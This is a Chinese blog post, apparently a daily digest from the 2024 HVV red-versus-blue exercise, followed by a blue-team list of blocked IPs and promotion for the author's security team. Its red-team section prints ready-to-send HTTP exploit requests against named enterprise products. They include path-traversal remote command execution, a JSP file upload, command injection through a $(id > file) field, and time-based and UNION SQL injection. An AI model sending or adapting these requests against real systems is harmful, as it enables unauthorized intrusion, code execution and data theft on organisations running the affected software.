day2-HVV四贱客陆续登场:帆xx、xx微、xx远、xx友

已于 2024-07-25 11:37:23 修改
阅读量510 收藏 12
点赞数 9
文章标签: 网络安全 安全
于 2024-07-24 21:26:17 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shihuajushi12/article/details/140673084
版权

HWday2-HVV四贱客陆续登场:帆xx、xx微、xx远、xx友
原创:病毒獵手 童杭波

竹枝词二首·其一
宋·黄庭坚
浮云一百八盘萦,落日四十八渡明。
鬼门关外莫言远,四海一家皆弟兄。
在这里插入图片描述

一、红队攻击
1.红队漏洞情况
【演练实时消息】

【消息时间】2024-07-24

【消息标题】:XX凌EKP存在sys_ui_component远程命令执行漏洞

【消息详情】:

POST/sys/ui/sys_ui_component/sysUiComponent.do HTTP/1.1

Host:xx.xx.xx.xx

Accept:application/json, text/javascript, /; q=0.01

Accept-Encoding:gzip, deflate

Accept-Language:zh-CN,zh;q=0.9,en;q=0.8

Connection:close

Content-Length:401

Content-Type:multipart/form-data; boundary=----WebKitFormBoundaryL7ILSpOdIhIIvL51User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X xxx)AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15X-Requested-With: XMLHttpRequest

------WebKitFormBoundaryL7ILSpOdIhIIvL51

Content-Disposition:form-data; name=“method”

replaceExtend------WebKitFormBoundaryL7ILSpOdIhIIvL51

Content-Disposition:form-data; name=“extendId”

…/…/…/…/resource/help/km/review/

------WebKitFormBoundaryL7ILSpOdIhIIvL51

Content-Disposition:form-data; name=“folderName”

…/…/…/ekp/sys/common------WebKitFormBoundaryL7ILSpOdIhIIvL51–

/resource/help/kms/knowledge/dataxml.jsp

【演练实时消息】

【消息时间】:2024-07-24

【消息标题】:润XX报表dataSphereServlet 任意文件上传漏洞

【消息详情】:PosT /servlet/dataSphereServlet?action=38 HTTP/1.1

Host:127.0.0.1

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)

Accept-Encoding: gzip, deflate

Accept:/

Connection: close

Content-Length: 397

Content-Type: multipart/form-data;boundary=eac629ee4641cb0fe10596fba5e0c5d9

–eac629ee4641cb0fe10596fba5e0c5d9

Content-Disposition: form-data; name=“openGrpxFile”; filename=“539634.jsp”

Content-Type: text/plain

<% out.println(“873227518”); %>

–eac629ee4641cb0fe10596fba5e0c5d9

Content-Disposition:

form-data;

name=“path”

–eac629ee4641cb0fe10596fba5e0c5d9

Content-Disposition: form-data; name=“saveServer”

1

-eac629ee4641cb0fe10596fba5e0c5d9-

【演练实时消息】

【消息时间】2024-07-24:

【消息标题】:帆XX未授权命令执行

【消息详情】:

GET /webroot/decision/view/ReportServer?test=ssssssssssssSSSSsssssSSsssSSssS!

host:xxxx

connection: close

content-type:application/x-www-form-urlencoded

x-forwarded-for:xxxx

accept-encoding: gzip, deflate

user-agent: python-requests/2.31.o

accept:/

/webroot/aaa.jsp

【演练实时消息】

【消息时间】:2024-07-24

【消息标题】:XXX视综合安防管理平台 前台RCE

【消息详情】:

POST /center/api/installation/detection HTTP/1.1

Host:

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36

(KHTML, like Gecko) Chrome/105.0.1249.139 Safari/537.36

Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Connection: close

Content-Type: application/json;charset=UTF-8

{“type”:“environment”,“operate”:“”,“machines”:{“id”: “$(id > /opt/hikvision/web/components/tomcat85linux64.1/webapps/vms/static/echo.txt)”}}

【演练实时消息】

【消息时间】:2024-07-24

【消息标题】:亿XX数据泄露防护(DLP)系统 NetSecConfigAjax SQL注入

【消息详情】:

POST /CDGServer3/NetSecConfigAjax;Service HTTP/1.1

Host:

Content-Type: application/x-www-form-urlencoded

command=updateNetSec&state=123’;if(selectIS_SRVROLEMEMBER(‘sysadmin’))=1 WAITFOR DELAY ‘0:0:5’–

【演练实时消息】

【消息时间】:2024-07-24

【消息标题】:指挥调度管理平台 ajax_users.php SQL 注入漏洞

【消息详情】:

POST /app/ext/ajax_users.php HTTP/1.1

Host:

User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0info

Content-Type:

application/x-www-form-urlencoded dep_level=1’)UNION ALL

SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

二、蓝队防守
1.蓝队封禁IP列表
115.223.23.169

182.92.101.38

39.105.59.253

117.80.146.225

113.2.165.197

103.42.181.141

119.179.253.223

103.68.195.70

36.134.153.49

123.56.123.115

123.57.137.73

112.25.79.66

223.15.243.43

47.103.57.73

106.124.140.167

113.219.243.90

三、 笑话
网安西格玛男人,互联网大厂高管的高富帅!

在这里插入图片描述
在这里插入图片描述

四、公众号
团队成立于2016年,WIS-HUNTER(中文全称智慧网络病毒猎手),拥有最全的信息安全服务内容;具备强大的安全研究团队,公司下辖多个实验室,其中杀手锏攻防实验室拥有大批漏洞发掘和分析人员,是独立发掘CVE和CNVD漏洞数量的团队;拥有覆盖8*N人的专业安全服务团队。

团队理念:

【理念】

以小博大,技术是杀手锏。

【文化】

1.明白人:知其然,知其所以然!不要迷惑于表象而要洞察事务的本质,要有文盲学习知识的心态,有时我们的学历,是我们学习过程中 最大的障碍。

2.出品人:本人出品,必属上品!有自我荣誉意识、追求卓越意识。乔布斯:人这辈子没法做太多事情,所以每一件都要做到精彩绝伦。

WIS-HUNTER-战国云安全实验室
关注
  • 9
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
day1-HVV开局 IP IP 封IP~
智慧网络病毒猎手的博客
07-24 335
少量的大佬神出鬼没,大量的初级入员混杂着临时工,写段子永比写exp快,不怎么惹防御强的目标,专挑软柿子捏,名为hacker,实为扫描器的附属品,经常没有战果,只能靠肝。【消息详情】:漏洞等级:超危。神一般的危机直觉,隔着网线嗅到红方的逼近,三秒补上一个洞,网安界的兰博,一个人战斗力超过300000吨的防火墙,永动机级别的精力,蓝方老哥永不眠。【消息详情】:泛内部情报。锐利的眼神,敏锐的直觉,一眼看穿内核级漏洞的存在,现场开发exp,不欺负弱者,专挑最强的对手挑战,一发打穿对面狗头,然后飘然而去。
基础了解--hvv学习笔记
m0_61682648的博客
03-07 415
本人在上大学,下面是做的一些笔记,如有问题,欢迎批评指正。
Hvv--知攻善防应急响应靶机--Web2
GDL1411983801的博客
06-12 727
所有靶机均来自知攻善防实验室官方WP:https://mp.weixin.qq.com/s/opj5dJK7htdawkmLbsSJiQApache、FTP日志Log Parser 程登录日志QQ文件默认存放位置账号:Administrator密码:Zgsf@qq.com。
HVV爆火漏洞:最新 WPS RCE (程命令执行) 复现
qq_69775412的博客
08-23 1553
最近HVV爆出的很火的WPS命令执行漏洞,其实并不是0DAY,早在2019年就出现了,只不过最近EXP才公开。接下来我们来复现一遍。
hvv-rest:汉堡公共交通的HTTP API
05-23
hvv-rest是一种公共交通REST API ,是的干净替代方案。 它部署在 。 安装和运行 hvv-rest期望服务器在127.0.0.1:6379 (默认端口)上运行,但是您可以设置REDIS_URL环境变量来更改此设置。 通过Docker Docker映像 ...
cve-2010-0796检测工具和攻击代码:.txt
04-22
价值5999,vip免费阅读,可用于实战拟态,渗透测试学习,资源复现,红蓝对抗,攻防打点,漏洞复现,技术考证、权限维持,应急响应,Hvv实战
schema-registry-gitops:通过基础架构以代码方式管理Confluent Schema Registry主题
05-24
概述架构注册表GitOps是一种“基础结构即代码”工具,它将通过...用法 Usage: schema-registry-gitops [-hvV] [--properties=] [-r=] [COMMAND]Manages schema registries through Infrastructure as Code -h, --help S
HVVGTI:HVV Geofox API 的 Java API 客户端
06-16
HVVGTI:HVV Geofox API 的 Java API 客户端】 HVVGTI 是一个专门为 Hochbahn Hamburg 设计的 Java API 客户端,它实现了与 HVV Geofox API 的交互。HVV(Hamburger Verkehrsbetriebe)是汉堡公共交通系统的运营商...
干货 - 最新HVV自我提升实践资料精心整理合集(共11专题81份).zip
05-04
最新HVV自我提升实践资料精心整理合集,共11专题81份。 1.自我排查 2.安全运营 3.研判分析 4.溯源反打 5.HVV必备报告模板 6.历年护网总结 7.防御必备 8.应急响应 9.护网行动培训材料 10.红队手册 11.HVV实战演习 ...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8346
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
软蓝屏事件引发对构建更加稳固和安全的网络环境的思考
最新发布
lupai的博客
07-24 326
综上所述,构建更加稳固和安全的网络环境需要政府、企业和用户共同努力,从政策、技术、用户行为等多个方面入手,形成全方位、多层次的网络安全防护体系。构建更加稳固和安全的网络环境是一个系统工程,需要从多个方面入手,包括政策、技术、用户行为等多个层面。建立完善的应急响应机制,制定应急预案和演练计划,提高应对网络攻击和突发事件的能力。鼓励和支持网络安全技术的研发和创新,推动新技术在网络安全领域的应用和推广。加强对用户的网络安全教育,提高用户的网络安全意识和防范能力。
网络战时代的国家安全:策略、技术和国际合作
2301_79955948的博客
07-24 960
网络战时代的国家安全涉及到策略、技术和国际合作等多个方面。
ForCloud全栈安全体验,一站式云安全托管试用 开启全能高效攻防
亚信安全官方账号的博客
07-19 586
一站式云安全托管限时试用 开启全能高效攻防
防火墙--内容安全
banliyaoguai的博客
07-20 1220
内容安全是指对互联网上的内容进行监测、筛选和管理,以确保用户在浏览、使用互联网内容时的安全和合法性。各个厂商在进行内容安全的检测、分析和处理的过程被称为引擎。下面以华为IAE引擎来对内容安全进行学习ID:区分不同的签名对象:服务器,客户端。一般我们将发起连接的设备角色认定为客户端,响应连接并提供服务的角色认定为服务器。严重性:该行为一旦爆发之后,对我们网络系统的影响程度的评级协议/应用程序:这种攻击所承载的协议或者应用。
服务攻防-框架安全(漏洞复现)
m0_74402888的博客
07-21 567
Node.js库中的systeminformation软件包中存在一个命令注入漏洞(CVE-2021-21315。运行dockers容器。
防火墙之内容安全过滤技术篇
qq_67758645的博客
07-19 660
IMAP是一种在线协议,它不用将邮件下载到本地,可以在多台支持IMAP协议的设备上同时进行文件的操作,它会将用户的操作同步到服务器上,实现邮件的共享和同步。而IMAP协议支持双向通信,用户可以在不同的设备上对邮件进行标记、移动、删除等操作,这些操作会实时同步到服务器上,确保邮件状态的一致性。IMAP允许邮件保留在服务器上,用户可以在任何支持IMAP的设备上访问这些邮件,实现邮件的同步和共享。可以执行的动作 --- 告警,阻断,按权重操作 -- 我们可以给每个关键字设置权重值,之后根。(一定时间后会删除)
nginx的配置:TLSv1 TLSv1.1 被暴露不安全
keyboard专栏
07-22 287
要在 Nginx 配置中禁用不安全的 SSL 协议(如 TLSv1 和 TLSv1.1),并仅启用更安全的协议(如 TLSv1.2 和 TLSv1.3),您可以更新您的 Nginx 配置文件。这样,您的 Nginx 服务器将只允许更安全的 TLSv1.2 和 TLSv1.3 协议,并且禁用不安全的 TLSv1 和 TLSv1.1。
探究大语言模型(LLM)漏洞和安全优秀实践
java_cjkl的博客
07-21 1092
你可能已听说过LLM强势亮相,至少ChatGPT就是代表。大语言模型(LLM)指语言处理模型。这类模型经过训练,可以执行各种各样的语言任务:翻译、文本生成和问题回答等。有几个LLM家族和架构,最著名的是GPT(生成式预训练Transformer)。每种 LLM都有各自的特定功能,但本文侧重介绍LLM普遍固有的安全问题。随着越来越多的公司集成LLM以增强用户体验或简化和加速内部流程,这种类型的集成特有的新漏洞随之出现。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值